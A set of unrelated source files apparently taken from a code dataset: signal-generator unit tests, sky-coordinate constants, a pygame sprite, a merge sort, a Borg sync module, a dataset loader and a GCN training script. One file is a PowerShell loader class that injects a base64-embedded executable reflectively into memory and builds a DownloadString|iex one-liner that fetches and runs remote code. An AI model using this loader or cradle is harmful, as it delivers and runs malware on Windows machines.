fy.is_serial = True
self.assertEqual(12345678900, fy.get(1, 'freq_uhz'))
self.assertEqual('RFF\n', fs.getvalue())
def test_get_volts(self):
"""Gets the amplitude voltage."""
fs = FakeSerial([b'123400\n', b'5000\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12.34, fy.get(0, 'volts'))
self.assertEqual(0.5, fy.get(1, 'volts'))
self.assertEqual('RMA\nRFA\n', fs.getvalue())
def test_get_offset_volts(self):
"""Gets the offset voltage."""
fs = FakeSerial([b'12340\n', b'4294962296\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12.34, fy.get(0, 'offset_volts'))
self.assertEqual(-5, fy.get(1, 'offset_volts'))
self.assertEqual('RMO\nRFO\n', fs.getvalue())
def test_get_phase_degrees(self):
"""Gets the phase angle."""
fs = FakeSerial([b'0\n', b'189300\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(0, fy.get(0, 'phase_degrees'))
self.assertEqual(189.3, fy.get(1, 'phase_degrees'))
self.assertEqual('RMP\nRFP\n', fs.getvalue())
def test_get_duty_cycle(self):
"""Gets the duty cycle."""
fs = FakeSerial([b'50000\n', b'10500\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(0.5, fy.get(0, 'duty_cycle'))
self.assertEqual(0.105, fy.get(1, 'duty_cycle'))
self.assertEqual('RMD\nRFD\n', fs.getvalue())
def test_set_waveform(self):
"""Sets a custom waveform."""
wave = [-1.0, 0.0, 1.0, 0.0] * 2048
self.fy.set_waveform(5, values=wave)
expected = 'DDS_WAVE5\n'
expected += '00000020FF3F002000000020FF3F0020\n' * 1024
self.assertEqual(expected, self.output.getvalue())
def test_set_raw_waveform(self):
"""Sets a custom waveform using raw values."""
wave = [1, 2, 3, 4] * 2048
self.fy.set_waveform(6, raw_values=wave)
expected = 'DDS_WAVE6\n'
expected += '01000200030004000100020003000400\n' * 1024
self.assertEqual(expected, self.output.getvalue())
def test_bad_waveform_index(self):
"""Passes an invalid waveform index."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set_waveform(0, raw_values=[0]*8192)
def test_raw_value_conflict_error(self):
"""Passes both values and raw_values."""
with self.assertRaises(fygen.RawValueConflictError):
self.fy.set_waveform(1, values=[0.0] * 8192, raw_values=[0]*8192)
def test_value_count_error(self):
"""Passes the wrong array size."""
with self.assertRaises(fygen.ValueCountError):
self.fy.set_waveform(1, raw_values=[0]*8191)
with self.assertRaises(fygen.ValueCountError):
self.fy.set_waveform(1, values=[0.0]*8191)
def test_cmd_noack_error(self):
"""Simulates the siggen not responsing to the DDR_WAVE request."""
fs = FakeSerial([b'0\n', b'0\n', b'E\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.CommandNotAcknowledgedError):
fy.set_waveform(1, values=[0.0]*8192)
def test_data_noack_error(self):
"""Simulates the siggen not responsing to data sent."""
fs = FakeSerial([b'0\n', b'0\n', b'W\n', b'E\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.CommandNotAcknowledgedError):
fy.set_waveform(1, values=[0.0]*8192)
def test_set_sweep(self):
"""Tries every known sweep variable."""
self.fy.set_sweep(enable=False, mode=fygen.SWEEP_FREQUENCY)
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE)
self.fy.set_sweep(mode=fygen.SWEEP_OFFSET)
self.fy.set_sweep(mode=fygen.SWEEP_DUTY_CYCLE)
self.fy.set_sweep(log_sweep=False)
self.fy.set_sweep(log_sweep=True)
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_TIME)
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_VCO_IN)
self.fy.set_sweep(time_seconds=10.1)
self.fy.set_sweep(start_freq_hz=1234.56, end_freq_hz=1234.56)
self.fy.set_sweep(start_volts=12.3456, end_volts=12.3456)
self.fy.set_sweep(start_offset_volts=-12.3456, end_offset_volts=-12.3456)
self.fy.set_sweep(start_duty_cycle=0.1, end_duty_cycle=0.9)
self.assertEqual(
'SBE0\n'
'SOB0\n'
'SBE0\n'
'SOB1\n'
'SBE0\n'
'SOB2\n'
'SBE0\n'
'SOB3\n'
'SBE0\n'
'SMO0\n'
'SBE0\n'
'SMO1\n'
'SBE0\n'
'SXY0\n'
'SBE0\n'
'SXY1\n'
'SBE0\n'
'STI10.10\n'
'SBE0\n'
'SST1234.6\n'
'SEN1234.6\n'
'SBE0\n'
'SST12.346\n'
'SEN12.346\n'
'SBE0\n'
'SST-2.346\n'
'SEN-2.346\n'
'SBE0\n'
'SST10.0\n'
'SEN90.0\n'
'',
self.output.getvalue())
def test_sweep_enable(self):
"""Tries to enable sweep mode."""
with self.assertRaises(fygen.PossibleFirmwareBugError):
self.fy.set_sweep(enable=True)
def test_sweep_enable_forced(self):
"""Tries to enable sweep mode."""
fy = fygen.FYGen(port=self.output)
fy.force_sweep_enable = True
fy.set_sweep(enable=True)
self.assertEqual('SBE1\n', self.output.getvalue())
def test_invalid_sweep_mode(self):
"""Sets an invalid sweep mode."""
with self.assertRaises(fygen.InvalidSweepModeError):
self.fy.set_sweep(mode=5)
def test_invalid_sweep_source(self):
"""Sets an invalid sweep source."""
with self.assertRaises(fygen.InvalidSweepSourceError):
self.fy.set_sweep(source=2)
def test_sweep_vco_with_time(self):
"""Sets a time with a VCO source."""
with self.assertRaises(fygen.InvalidSweepSourceError):
self.fy.set_sweep(source=fygen.SWEEP_SOURCE_VCO_IN, time_seconds=1)
def test_invalid_sweep_time(self):
"""Sets an invalid sweep time."""
with self.assertRaises(fygen.InvalidSweepTimeError):
self.fy.set_sweep(time_seconds=0)
def test_sweep_start_freq_in_invalid_mode(self):
"""Sets start_freq_hz in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE, start_freq_hz=1000)
def test_invalid_start_freq(self):
"""Sets start_freq_hz to zero."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_sweep(start_freq_hz=0)
def test_sweep_end_freq_in_invalid_mode(self):
"""Sets end_freq_hz in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_AMPLITUDE, end_freq_hz=1000)
def test_invalid_end_freq(self):
"""Sets end_freq_hz to zero."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_sweep(end_freq_hz=0)
def test_sweep_start_volts_in_invalid_mode(self):
"""Sets start_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_volts=10)
def test_invalid_start_volts(self):
"""Sets start_volts to zero and too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_volts=0)
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_volts=30)
def test_sweep_end_volts_in_invalid_mode(self):
"""Sets end_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_volts=10)
def test_invalid_end_volts(self):
"""Sets end_volts to zero and too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_volts=0)
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_volts=30)
def test_sweep_start_offset_volts_in_invalid_mode(self):
"""Sets start_offset_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_offset_volts=10)
def test_invalid_start_offset_volts(self):
"""Sets start_offset_volts too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(start_offset_volts=30)
def test_sweep_end_offset_volts_in_invalid_mode(self):
"""Sets end_offset_volts in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_offset_volts=10)
def test_invalid_end_offset_volts(self):
"""Sets end_offset_volts too high."""
with self.assertRaises(fygen.InvalidVoltageError):
self.fy.set_sweep(end_offset_volts=30)
def test_sweep_start_duty_cycle_in_invalid_mode(self):
"""Sets start_duty_cycle in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, start_duty_cycle=0.1)
def test_invalid_start_duty_cycle(self):
"""Sets start_duty_cycle to zero and too high."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(start_duty_cycle=0)
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(start_duty_cycle=1)
def test_sweep_end_duty_cycle_in_invalid_mode(self):
"""Sets end_duty_cycle in amplitude mode."""
with self.assertRaises(fygen.InvalidModeError):
self.fy.set_sweep(mode=fygen.SWEEP_FREQUENCY, end_duty_cycle=0.9)
def test_invalid_end_duty_cycle(self):
"""Sets end_duty_cycle to zero and one."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(end_duty_cycle=0)
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set_sweep(end_duty_cycle=1)
def test_set_measurement(self):
"""Tests all combinations of set_measurement."""
self.fy.set_measurement(reset_counter=True)
self.fy.set_measurement(pause=False)
self.fy.set_measurement(pause=True)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_1S)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_10S)
self.fy.set_measurement(gate_time=fygen.GATE_TIME_100S)
self.fy.set_measurement(coupling=fygen.COUPLING_DC)
self.fy.set_measurement(coupling=fygen.COUPLING_AC)
self.assertEqual(
'WCZ0\n'
'WCP1\n'
'WCP0\n'
'WCG0\n'
'WCG1\n'
'WCG2\n'
'WCC1\n'
'WCC0\n',
self.output.getvalue())
def test_set_measurement_invalid_gate_time(self):
"""Passes an invalid gate_time."""
with self.assertRaises(fygen.InvalidGateTimeError):
self.fy.set_measurement(gate_time=4)
def test_set_measurement_invalid_coupling(self):
"""Passes an invalid coupling."""
with self.assertRaises(fygen.InvalidCouplingError):
self.fy.set_measurement(coupling=2)
def test_get_measurement(self):
"""Gets all measurements."""
fs = FakeSerial([
b'0\n', # gate mode = 1S
b'0000000668\n', # freq_hz
b'0000060668\n', # period_sec
b'0000012345\n', # positive_width_sec
b'0000054321\n', # negative_width_sec
b'0000000541\n', # duty cycle
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(
{
'freq_hz': 668.0,
'period_sec': 6.0668e-5,
'positive_width_sec': 1.2345e-5,
'negative_width_sec': 5.4321e-5,
'duty_cycle': 0.541
},
fy.get_measurement())
def test_get_measurement_counter(self):
"""Gets the counter measurement."""
fs = FakeSerial([
b'0000000669\n', # counter
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({'counter': 669}, fy.get_measurement({'counter'}))
def test_get_measurement_frequency(self):
"""Gets frequencies."""
fs = FakeSerial([
b'0\n', # gate mode = 1S
b'0000000668\n', # freq_hz
b'1\n', # gate mode = 10S
b'0000000668\n', # freq_hz
b'2\n', # gate mode = 100S
b'0000000668\n', # freq_hz
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(668.0, fy.get_measurement('freq_hz'))
self.assertEqual(66.8, fy.get_measurement('freq_hz'))
self.assertEqual(6.68, fy.get_measurement('freq_hz'))
def test_get_measurement_invalid_gate_time(self):
"""siggen returns an unexpected gate time mode."""
fs = FakeSerial([
b'x\n', # gate mode = ???
b'0000000668\n', # freq_hz
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.InvalidGateTimeError):
fy.get_measurement('freq_hz')
def test_get_measurement_unknown_parameter(self):
"""requests an unknown parameter."""
with self.assertRaises(fygen.UnknownParameterError):
self.fy.get_measurement('foo')
def test_save(self):
"""Saves parameters."""
self.fy.save(2)
self.assertEqual('USN02\n', self.output.getvalue())
def test_load(self):
"""Loads parameters."""
self.fy.load(3)
self.assertEqual('ULN03\n', self.output.getvalue())
def test_set_synchronization(self):
"""Sets all known sync modes."""
self.fy.set_synchronization(wave=True)
self.fy.set_synchronization(freq=True)
self.fy.set_synchronization(volts=True)
self.fy.set_synchronization(offset_volts=True)
self.fy.set_synchronization(duty_cycle=True)
self.assertEqual(
'USA0\n'
'USA1\n'
'USA2\n'
'USA3\n'
'USA4\n'
'',
self.output.getvalue())
def test_get_synchronization(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'0\n', # duty cycle
b'255\n', # freq
b'0\n', # offset_volts
b'255\n', # volts
b'0\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({
'duty_cycle': False,
'freq': True,
'offset_volts': False,
'volts': True,
'wave': False,
}, fy.get_synchronization())
self.assertEqual(
'RSA4\n'
'RSA1\n'
'RSA3\n'
'RSA2\n'
'RSA0\n'
'',
fs.getvalue())
def test_get_synchronization_dict(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'255\n', # duty cycle
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(
{'duty_cycle': True},
fy.get_synchronization(('duty_cycle',)))
self.assertEqual('RSA4\n', fs.getvalue())
def test_get_synchronization_single(self):
"""Gets all known sync modes."""
fs = FakeSerial([
b'0\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(False, fy.get_synchronization('wave'))
self.assertEqual('RSA0\n', fs.getvalue())
def test_get_invalid_sync_mode(self):
"""Gets an invalid sync mode."""
with self.assertRaises(fygen.InvalidSynchronizationMode):
self.fy.get_synchronization('foo')
def test_set_buzzer(self):
"""Sets the buzzer."""
self.fy.set_buzzer(False)
self.fy.set_buzzer(True)
self.assertEqual('UBZ0\nUBZ1\n', self.output.getvalue())
def test_get_buzzer(self):
"""Gets buzzer state."""
fs = FakeSerial([
b'0\n',
b'255\n',
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertFalse(fy.get_buzzer())
self.assertTrue(fy.get_buzzer())
self.assertEqual('RBZ\nRBZ\n', fs.getvalue())
def test_set_uplink(self):
"""Tries all setuplink combinations."""
self.fy.set_uplink(is_master=True, enable=False)
self.fy.set_uplink(is_master=False, enable=True)
self.assertEqual(
'UUL0\n'
'UMS0\n'
'UMS1\n'
'UUL1\n'
'',
self.output.getvalue())
def test_get_uplink(self):
"""Gets uplink settings."""
fs = FakeSerial([
b'0\n',
b'255\n',
b'255\n',
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({'enable': False, 'is_master': False}, fy.get_uplink())
self.assertTrue(fy.get_uplink('enable'))
self.assertEqual('RUL\nRMS\nRUL\n', fs.getvalue())
def test_get_id(self):
"""Gets device id."""
fs = FakeSerial([b'12345\n',])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('12345', fy.get_id())
self.assertEqual('UID\n', fs.getvalue())
def test_get_model(self):
"""Gets device model."""
fs = FakeSerial([b'fy2300\n',])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('fy2300', fy.get_model())
self.assertEqual('UMO\n', fs.getvalue())
def test_auto_detect_on_init(self):
"""Autodetects runs on FYGen init"""
fs = FakeSerial([b'FY6900-60\n',])
fy = fygen.FYGen(port=fs, _port_is_serial=True)
self.assertEqual('fy6900', fy.device_name)
self.assertEqual('UMO\n', fs.getvalue())
def test_auto_detect(self):
self.assertEqual(fygen.detect_device('FY6900-60M'), 'fy6900')
self.assertEqual(fygen.detect_device('FY2350H'), 'fy2300')
def test_autodetect_no_conflict(self):
"""
Make sure no exact match maps to the wrong device.
        This is just to future-proof in case two devices with the same
        leading 4-char prefix get added that have different waveform ids.
"""
for device in SUPPORTED_DEVICES:
self.assertEqual(fygen.detect_device(device), device)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
130000 | <reponame>RileyWClarke/flarubin<gh_stars>0
# Tuples of RA,dec in degrees
ELAISS1 = (9.45, -44.)
XMM_LSS = (35.708333, -4-45/60.)
ECDFS = (53.125, -28.-6/60.)
COSMOS = (150.1, 2.+10./60.+55/3600.)
EDFS_a = (58.90, -49.315)
EDFS_b = (63.6, -47.60)
def ddf_locations():
"""Return the DDF locations as as dict. RA and dec in degrees.
"""
result = {}
result['ELAISS1'] = ELAISS1
result['XMM_LSS'] = XMM_LSS
result['ECDFS'] = ECDFS
result['COSMOS'] = COSMOS
result['EDFS_a'] = EDFS_a
result['EDFS_b'] = EDFS_b
return result
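# Minimal usage sketch (illustrative only):
if __name__ == '__main__':
    ra, dec = ddf_locations()['COSMOS']
    print('COSMOS field center: RA=%.4f deg, Dec=%.4f deg' % (ra, dec))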
| StarcoderdataPython |
171743 | <filename>NPC.py
import sys, pygame, math
class NPC(pygame.sprite.Sprite):
def __init__(self, maxSpeed, pos = [0,0]):
pygame.sprite.Sprite.__init__(self, self.containers)
#Images From: URL: http://opengameart.org/content/classic-knight-animated
playerSize = [25,25]
self.rightImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkRight0.png"), playerSize)
]
self.leftImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkLeft0.png"), playerSize)
]
self.upImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkUp0.png"), playerSize)
]
self.downImages = [pygame.transform.scale(pygame.image.load("NPC\NPC Images\walkDown0.png"), playerSize)
]
self.images = self.rightImages
self.frame = 0
self.maxFrame = len(self.images)-1
self.image = self.images[self.frame]
self.rect = self.image.get_rect()
self.xDirection = "right"
self.yDirection = "none"
self.speedx = 0
self.speedy = 0
self.speed = [self.speedx, self.speedy]
self.maxSpeedx = maxSpeed[0]
self.maxSpeedy = maxSpeed[1]
self.timer = 0
self.timerMax = .25* 60
self.didBounceX = False
self.didBounceY = False
self.rect = self.rect.move(pos)
self.living = True
self.lives = 3
self.score = 0
def die(self):
self.lives -= 1
if self.lives <= 0:
self.living = False
def update(*args):
self = args[0]
size = args[1]
self.move()
self.animate()
self.collideScreen(size)
def collideObject(self, other):
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
if self.radius + other.radius > self.distanceTo(other.rect.center):
return True
return False
def collideScreen(self, size):
width = size[0]
height = size[1]
if not self.didBounceX:
if self.rect.center[0] < -1:
self.rect.center = (width, self.rect.center[1])
elif self.rect.center[0] > width+1:
self.rect.center = (0, self.rect.center[1])
def collideHardblock(self, other):
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
self.speedx = -self.speedx
self.speedy = -self.speedy
self.move()
self.speedx = 0
self.speedy = 0
def animate(self):
if self.timer < self.timerMax:
self.timer += 1
else:
self.timer = 0
if self.frame < self.maxFrame:
self.frame += 1
else:
self.frame = 0
self.image = self.images[self.frame]
def move(self):
self.speed = [self.speedx, self.speedy]
self.rect = self.rect.move(self.speed)
self.didBounceX = False
self.didBounceY = False
def distanceTo(self, pt):
x1 = self.rect.center[0]
y1 = self.rect.center[1]
x2 = pt[0]
y2 = pt[1]
return math.sqrt((x1-x2)**2+(y1-y2)**2)
| StarcoderdataPython |
1749063 | <gh_stars>1-10
#
# MIT License
#
# Copyright 2017 Launchpad project contributors (see COPYRIGHT.md)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import base64
import os
from django.conf import settings
from .interface import BaseLoader
ps1_loader_template = """
{script}
$b = @"
{executable}
"@
$b = [Byte[]][Convert]::FromBase64String($b)
Invoke-ReflectivePEInjection -PEBytes $b -ForceASLR
"""
class Ps1Loader(BaseLoader):
platform = ['windows']
cpu = ['x86', 'x64']
def get_loader(self, executable):
with open(str(settings.DEPENDENCIES_DIR / 'ps1' / 'Invoke-ReflectivePEInjection.ps1'), 'r') as fp:
script = fp.read()
if isinstance(executable, (str, os.PathLike)):
with open(executable, 'rb') as fp:
executable = fp.read()
elif not isinstance(executable, (bytes, bytearray)):
raise ValueError('`executable` must be path to a file or binary blob.')
executable = base64.b64encode(executable).decode()
result = ps1_loader_template.format(**locals())
return result
def get_oneliner(self, loader_url):
return f"(New-Object System.Net.WebClient).DownloadString('{loader_url}')|iex"
| StarcoderdataPython |
13707 | import pixiedust
my_logger = pixiedust.getLogger(__name__)
| StarcoderdataPython |
45004 | def mergeSort(elements):
if len(elements) == 0 or len(elements) == 1:
# BASE CASE
return elements
middle = len(elements) // 2
left = mergeSort(elements[:middle])
right = mergeSort(elements[middle:])
if left == [] or right == []:
return left or right
    # merge the two sorted halves
    result = []
    i, j = 0, 0
    while len(result) < len(left) + len(right):
        # append the smaller of the two current front elements
        if left[i] < right[j]:
            result.append(left[i])
            i += 1
        else:
            result.append(right[j])
            j += 1
        # if one half is exhausted, append the remainder of the other and stop
        if i == len(left) or j == len(right):
            result.extend(left[i:] or right[j:])
            break
    return result
print(mergeSort([3,4,5,1,2,8,3,7,6])) | StarcoderdataPython |
1653117 | <filename>src/borg/platform/base.py
import os
"""
platform base module
====================
Contains platform API implementations based on what Python itself provides. More specific
APIs are stubs in this module.
When functions in this module use platform APIs themselves they access the public
platform API: that way platform APIs provided by the platform-specific support module
are correctly composed into the base functionality.
"""
API_VERSION = 3
fdatasync = getattr(os, 'fdatasync', os.fsync)
def acl_get(path, item, st, numeric_owner=False):
"""
Saves ACL Entries
If `numeric_owner` is True the user/group field is not preserved only uid/gid
"""
def acl_set(path, item, numeric_owner=False):
"""
Restore ACL Entries
If `numeric_owner` is True the stored uid/gid is used instead
of the user/group names
"""
try:
from os import lchflags
def set_flags(path, bsd_flags, fd=None):
lchflags(path, bsd_flags)
except ImportError:
def set_flags(path, bsd_flags, fd=None):
pass
def get_flags(path, st):
"""Return BSD-style file flags for path or stat without following symlinks."""
return getattr(st, 'st_flags', 0)
def sync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class SyncFile:
"""
A file class that is supposed to enable write ordering (one way or another) and data durability after close().
The degree to which either is possible varies with operating system, file system and hardware.
This fallback implements a naive and slow way of doing this. On some operating systems it can't actually
guarantee any of the above, since fsync() doesn't guarantee it. Furthermore it may not be possible at all
to satisfy the above guarantees on some hardware or operating systems. In these cases we hope that the thorough
checksumming implemented catches any corrupted data due to misordered, delayed or partial writes.
Note that POSIX doesn't specify *anything* about power failures (or similar failures). A system that
routinely loses files or corrupts file on power loss is POSIX compliant.
TODO: Use F_FULLSYNC on OSX.
TODO: A Windows implementation should use CreateFile with FILE_FLAG_WRITE_THROUGH.
"""
def __init__(self, path):
self.fd = open(path, 'xb')
self.fileno = self.fd.fileno()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def write(self, data):
self.fd.write(data)
def sync(self):
"""
Synchronize file contents. Everything written prior to sync() must become durable before anything written
after sync().
"""
from .. import platform
self.fd.flush()
platform.fdatasync(self.fileno)
if hasattr(os, 'posix_fadvise'):
os.posix_fadvise(self.fileno, 0, 0, os.POSIX_FADV_DONTNEED)
def close(self):
"""sync() and close."""
from .. import platform
self.sync()
self.fd.close()
platform.sync_dir(os.path.dirname(self.fd.name))
def swidth(s):
"""terminal output width of string <s>
For western scripts, this is just len(s), but for cjk glyphs, 2 cells are used.
"""
return len(s)
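# Hedged usage sketch (added for illustration; not part of the original module). It shows
# the write/sync/close pattern described in the SyncFile docstring; the path below is an
# invented placeholder and must not already exist, since SyncFile opens in 'xb' mode.
def _example_syncfile_write(path='/tmp/example-syncfile.bin'):
    with SyncFile(path) as fd:
        fd.write(b'data that must be durable')
        fd.sync()  # everything written before this point becomes durable before later writes
        fd.write(b'data ordered after the sync')
    # __exit__ calls close(), which syncs again and fsyncs the containing directory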
| StarcoderdataPython |
177507 | <gh_stars>10-100
import os
from urllib import request
import numpy as np
from numpy import genfromtxt
from .. import pklhandler
'''
This module contains helper functions to download and load
the boston housing dataset.
'''
def get():
'''
Downloads the boston dataset from
https://archive.ics.uci.edu/ml/machine-learning-databases/housing/
and saves it as a pkl file `boston.pkl`.
Raises
------
urllib.error.URLError
If internet connection is not available or the URL is not accessible.
OSError
If the file cannot be created due to a system-related error.
KeyError
If invalid/unknown type.
Note
----
You only need to call this method once, i.e, after the dataset has been downloaded
and you have the `boston.pkl` file, you don't need to call this method again.
'''
# Url to download the dataset from
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/housing/housing.data'
# Download the dataset
print('Downloading housing.data...')
request.urlretrieve(url, 'housing.data')
print('Download complete.')
# Parse the data and save it as a pkl file
pklhandler.save(genfromtxt('housing.data'), 'boston.pkl')
# Delete unnecessary files
os.remove('housing.data')
print('Deleted unnecessary files.')
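# Hedged usage sketch (added; not part of the original helper). get() only needs to run once
# to create boston.pkl; afterwards load() (defined below) returns the saved numpy arrays.
def _example_usage():
    get()  # downloads housing.data and writes boston.pkl
    inputs_train, outputs_train, inputs_test, outputs_test = load()
    print(inputs_train.shape, outputs_train.shape)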
def load():
'''
Loads the boston housing dataset from pkl file.
The inputs have following columns:
- CRIM :
per capita crime rate by town
- ZN :
proportion of residential land zoned for lots over 25,000 sq.ft.
- INDUS :
proportion of non-retail business acres per town
- CHAS :
Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)
- NOX :
nitric oxides concentration (parts per 10 million)
- RM :
average number of rooms per dwelling
- AGE :
proportion of owner-occupied units built prior to 1940
- DIS :
weighted distances to five Boston employment centres
- RAD :
index of accessibility to radial highways
- TAX :
full-value property-tax rate per $10,000
- PTRATIO :
pupil-teacher ratio by town
- B :
1000(Bk - 0.63)^2 where Bk is the proportion of black by town
- LSTAT :
% lower status of the population
The outputs are
- MEDV :
Median value of owner-occupied homes in $1000's
Returns
-------
inputs_train : numpy.array
outputs_train : numpy.array
inputs_test : numpy.array
outputs_test : numpy.array
'''
data_array = pklhandler.load('boston.pkl')
inputs_train = data_array[0:500, :-1]
outputs_train = data_array[0:500, -1]
inputs_test = data_array[500:, :-1]
outputs_test = data_array[500:, -1]
return inputs_train, outputs_train, inputs_test, outputs_test | StarcoderdataPython |
3398720 | <filename>tests/unit/test_core_driver.py<gh_stars>1-10
import sys
import pytest
from ssh2net.exceptions import UnknownPrivLevel
from ssh2net.core.driver import BaseNetworkDriver
from ssh2net.core.cisco_iosxe.driver import PRIVS
IOS_ARP = """Protocol Address Age (min) Hardware Addr Type Interface
Internet 172.31.254.1 - 0000.0c07.acfe ARPA Vlan254
Internet 172.31.254.2 - c800.84b2.e9c2 ARPA Vlan254
"""
def test__determine_current_priv():
base_driver = BaseNetworkDriver()
base_driver.privs = PRIVS
current_priv = base_driver._determine_current_priv("execprompt>")
assert current_priv.name == "exec"
def test__determine_current_priv_unknown():
base_driver = BaseNetworkDriver()
base_driver.privs = PRIVS
with pytest.raises(UnknownPrivLevel):
base_driver._determine_current_priv("!!!!thisissoooowrongggg!!!!!!?!")
@pytest.mark.skipif(sys.platform.startswith("win"), reason="not supporting textfsm on windows")
def test_textfsm_parse_output():
base_driver = BaseNetworkDriver()
base_driver.textfsm_platform = "cisco_ios"
result = base_driver.textfsm_parse_output("show ip arp", IOS_ARP)
assert isinstance(result, list)
assert result[0] == ["Internet", "172.31.254.1", "-", "0000.0c07.acfe", "ARPA", "Vlan254"]
| StarcoderdataPython |
3336180 | <filename>AtCoder/ABC/153/D. Caracal Vs Monster.py
def f(x):
    # number of attacks needed to kill a monster with health x:
    # a monster with health 1 dies to a single attack; otherwise one attack splits it
    # into two monsters of health x // 2, so the total is 1 + 2 * f(x // 2)
    if x == 1:
        return 1
    else:
        k = f(x//2)
        return 1+2*k
H = int(input())
print(f(H)) | StarcoderdataPython |
1676698 | from __future__ import division
from __future__ import print_function
import time
import argparse
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
from pygcn.utils import load_data, accuracy
from pygcn.models import GCN, MLP
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
# Training settings
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=False,
help='Disables CUDA training.')
parser.add_argument('--fastmode', action='store_true', default=False,
help='Validate during training pass.')
parser.add_argument('--seed', type=int, default=42, help='Random seed.')
parser.add_argument('--epochs', type=int, default=5000,
help='Number of epochs to train.')
parser.add_argument('--lr', type=float, default=0.01,
help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=32,
help='Number of hidden units.')
parser.add_argument('--input_droprate', type=float, default=0.5,
help='Dropout rate of the input layer (1 - keep probability).')
parser.add_argument('--hidden_droprate', type=float, default=0.5,
help='Dropout rate of the hidden layer (1 - keep probability).')
parser.add_argument('--dropnode_rate', type=float, default=0.5,
help='Dropnode rate (1 - keep probability).')
parser.add_argument('--patience', type=int, default=100, help='Patience')
